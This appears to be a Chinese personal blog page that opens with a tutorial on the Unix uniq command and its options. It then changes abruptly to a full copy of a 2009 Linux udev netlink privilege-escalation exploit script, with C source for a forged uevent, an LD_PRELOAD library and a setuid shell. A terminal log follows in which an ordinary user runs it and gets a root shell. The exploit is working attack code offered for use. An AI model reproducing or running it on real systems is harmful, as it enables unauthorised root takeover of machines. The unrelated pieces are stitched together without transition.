阿熊的窝

# uniq --version
uniq (coreutils) 5.2.1

uniq [options] [file1 [file2] ]

-c, --count 
   在每行旁边显示该行重复出现的次数
-d, --repeated
   仅显示重复出现的行
-D, --all-repeated[=method]
   以指定的格式打印所有重复的行。格式仅适用于长选项参数，可使用none（默认），prepend，separate三个，效果见后面。以空行进行区分。
-f n, --skip-fields=n
   前n个字段与每个字段前的空白一起被忽略。一个字段（fields）是一个非空格、非制表符的字符串，彼此由制表符和空格隔开（字段从1开始编号）。与-n相同，n为字段数。
-i, --ignore-case
   在判断重复行时，忽略大小写区别
-s n, --skip-chars=n
   前n个字符被忽略，之前的字符被跳过（字符从1开始编号）。与+n相同，n为字符数。
-u, --unique
   仅显示出现一次的行
-w n, --check-chars=n
   仅比较每行前面n个字符
--help
   显示帮助信息
--version
   显示版本信息
[输入文件]
   已经排序好的文本文件或标准输入
[输出文件]
   指定的输出文件，若不指定，则显示在屏幕上

# cat text
The year.
The year.
Second
Second
Second
Third
Third
Four

# uniq -D text
The year.
The year.
Second
Second
Second
Third
Third
# uniq --all-repeated=prepend text
 
The year.
The year.
 
Second
Second
Second
 
Third
Third
# uniq --all-repeated=separate text
The year.
The year.
 
Second
Second
Second
 
Third
Third

# cat text
The year.
The year ok.
Second
Second
Second
Third
Third
Four

# uniq -u text
The year.
The year ok.
Four
# uniq -u -f 1 text
The year.
The year ok.
# uniq -u -f 2 text
The year.
The year ok.
# uniq -u -f 3 text

# uniq -u -f 2 -s 3 text
The year.
The year ok.
# uniq -u -f 2 -s 4 text
# uniq -u -2 +3 text
The year.
The year ok.
# uniq -u -2 +4 text

# cat text
test one
eest one
# uniq -u text
test one
eest one
# uniq -u -f 1 text
# uniq -u -s 1 text

uniq list list.new

sort names | uniq -d

#!/bin/sh
# Linux 2.6
# bug found by Sebastian Krahmer
#
# lame sploit using LD technique 
# by kcope in 2009
# tested on debian-etch,ubuntu,gentoo
# do a 'cat /proc/net/netlink'
# and set the first arg to this
# script to the pid of the netlink socket
# (the pid is udevd_pid - 1 most of the time)
# + sploit has to be UNIX formatted text :)
# + if it doesn't work the 1st time try more often
#
# WARNING: maybe needs some FIXUP to work flawlessly
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
 
cat > udev.c << _EOF
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <dirent.h>
#include <sys/stat.h>
#include <sysexits.h>
#include <wait.h>
#include <signal.h>
#include <sys/socket.h>
#include <linux/types.h>
#include <linux/netlink.h>
 
#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 15
#endif
 
#define SHORT_STRING 64
#define MEDIUM_STRING 128
#define BIG_STRING 256
#define LONG_STRING 1024
#define EXTRALONG_STRING 4096
#define TRUE 1
#define FALSE 0
 
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
struct iovec iovector;
int sz = 64*1024;
 
main(int argc, char **argv) {
        char sysfspath[SHORT_STRING];
        char subsystem[SHORT_STRING];
        char event[SHORT_STRING];
        char major[SHORT_STRING];
        char minor[SHORT_STRING];
 
        sprintf(event, "add");
        sprintf(subsystem, "block");
        sprintf(sysfspath, "/dev/foo");
        sprintf(major, "8");
        sprintf(minor, "1");
 
        memset(&address, 0, sizeof(address));
        address.nl_family = AF_NETLINK;
        address.nl_pid = atoi(argv[1]);
        address.nl_groups = 0;
 
        msg.msg_name = (void*)&address;
        msg.msg_namelen = sizeof(address);
        msg.msg_iov = &iovector;
        msg.msg_iovlen = 1;
 
        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
 
        char message[LONG_STRING];
        char *mp;
 
        mp = message;
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
        mp += sprintf(mp, "ACTION=%s", event) +1;
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
        mp += sprintf(mp, "MAJOR=%s", major) +1;
        mp += sprintf(mp, "MINOR=%s", minor) +1;
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
 
        iovector.iov_base = (void*)message;
        iovector.iov_len = (int)(mp-message);
 
        char *buf;
        int buflen;
        buf = (char *) &msg;
        buflen = (int)(mp-message);
 
        sendmsg(socket_fd, &msg, 0);
 
        close(socket_fd);
 
	sleep(10);
//	execl("/tmp/suid", "suid", (void*)0);
}
 
_EOF
gcc udev.c -o /tmp/udev
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <sys/stat.h>
 
 
void _init()
{
 setgid(0);
 setuid(0);
 unsetenv("LD_PRELOAD");
// execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
chown("/tmp/suid",0,0);
chmod("/tmp/suid",S_IRUSR|S_IWUSR|S_ISUID|S_IXUSR|S_IROTH|S_IXOTH);
}
 
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
cat > suid.c << _EOF
int main(void) {
       setgid(0); setuid(0);
       execl("/bin/sh","sh",0); }
_EOF
gcc -o /tmp/suid suid.c
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
/tmp/udev $1
 
# milw0rm.com [2009-04-20]
 
/tmp/suid

[test@sbear-cn test]$ id
uid=500(test) gid=500(test) groups=500(test)
[test@sbear-cn test]$ ps -ef|grep udev
root       502     1  0 13:04 ?        00:00:00 /sbin/udevd -d    //查看目前udevd服务的id号
test     2635  2564  0 13:07 pts/0    00:00:00 grep udev
[test@sbear-cn test]$ sh test.sh 501   //udevd的id号减1，即502-1 = 501
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
sh-3.2# id
uid=0(root) gid=0(root) groups=500(test)  //获取到root权限了
sh-3.2# ls /root/
anaconda-ks.cfg 
sh-3.2#